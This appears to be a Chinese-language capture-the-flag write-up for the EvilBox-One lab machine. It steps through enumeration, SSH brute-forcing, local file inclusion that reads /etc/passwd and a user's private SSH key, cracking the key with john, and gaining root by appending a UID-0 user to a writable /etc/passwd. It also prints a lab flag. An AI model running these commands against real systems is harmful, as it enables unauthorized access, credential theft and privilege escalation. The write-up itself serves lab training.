EvilBox—One
-
扫IP
netdiscover -i eth0 -r 192.168.70.0/24
-
详细扫
nmap -A 192.168.70.150
-
访问IP
-
扫描路径
dirb http://192.168.70.150
-
访问一遍
-
尝试爆破
hydra -l H4x0r -P top1000.txt ssh://192.168.70.150
,失败 -
查看更深路径
dirb http://192.168.70.150/secret/
,是空
-
利用gobuster再试一下
gobuster dir -w directory-list-1.0.txt -x html -u http://192.168.70.150/secret/ -x txt,php,jsp
-
运用模糊测试看是否有路径
wfuzz -c -w /usr/share/wordlists/wfuzz/general/megabeast.txt -u http://192.168.70.150/secret/evil.php?FUZZ=/etc/passwd --hh 0
-
访问
http://192.168.70.150/secret/evil.php?command=/etc/passwd
-
因为扫描到ssh服务,所以看用户有没有id_rsa
http://192.168.70.150/secret/evil.php?command=/home/mowree/.ssh/id_rsa
-
拿到authorized_keys,
http://192.168.70.150/secret/evil.php?command=/home/mowree/.ssh/authorized_keys
,改域名为ip -
将id_rsa和authorized_keys放到
/root/.ssh
目录下
authorized_keys 我们需要本地机器ssh访问远程服务器时为了减少输入密码的步骤,基本上都会在本地机器生成ssh公钥,然后将本地ssh公钥复制到远程服务器的.ssh/authorized_keys中,这样就可以免密登录了。( 服务器之间访问同理)。
-
提取密钥
ssh2john id_rsa > PK.txt
-
john解密
john PK.txt
,拿到密码unicorn
-
登录
ssh mowree@192.168.70.150
-
拿flag1
56Rbp0soobpzWSVzKh9YOvzGLgtPZQ
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传 -
使用
hash-identifier
查看加密类型=>无 -
查看内核版本
uname -a
/cat /proc/version
Linux EvilBoxOne 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 GNU/Linux
-
查看系统版本
cat /etc/issue
-
find / -perm -4000 2>/dev/null
-
find / -perm -2000 2>/dev/null
-
searchsploit linux 4.19
没什么漏洞 -
查找拥有写权限的文件
find / -writable 2>/dev/null | grep -v proc
-
创建密码
openssl passwd -1 123456
,-l代表md5加密
$1$YyfR0cZr$u2sqIsJObwKadVj8z69UK1
-
添加新用户
echo 'test:$1$YyfR0cZr$u2sqIsJObwKadVj8z69UK1:0:0::/root:/bin/bash' >>/etc/passwd
-
切换用户
su test
-
到根目录下拿flag2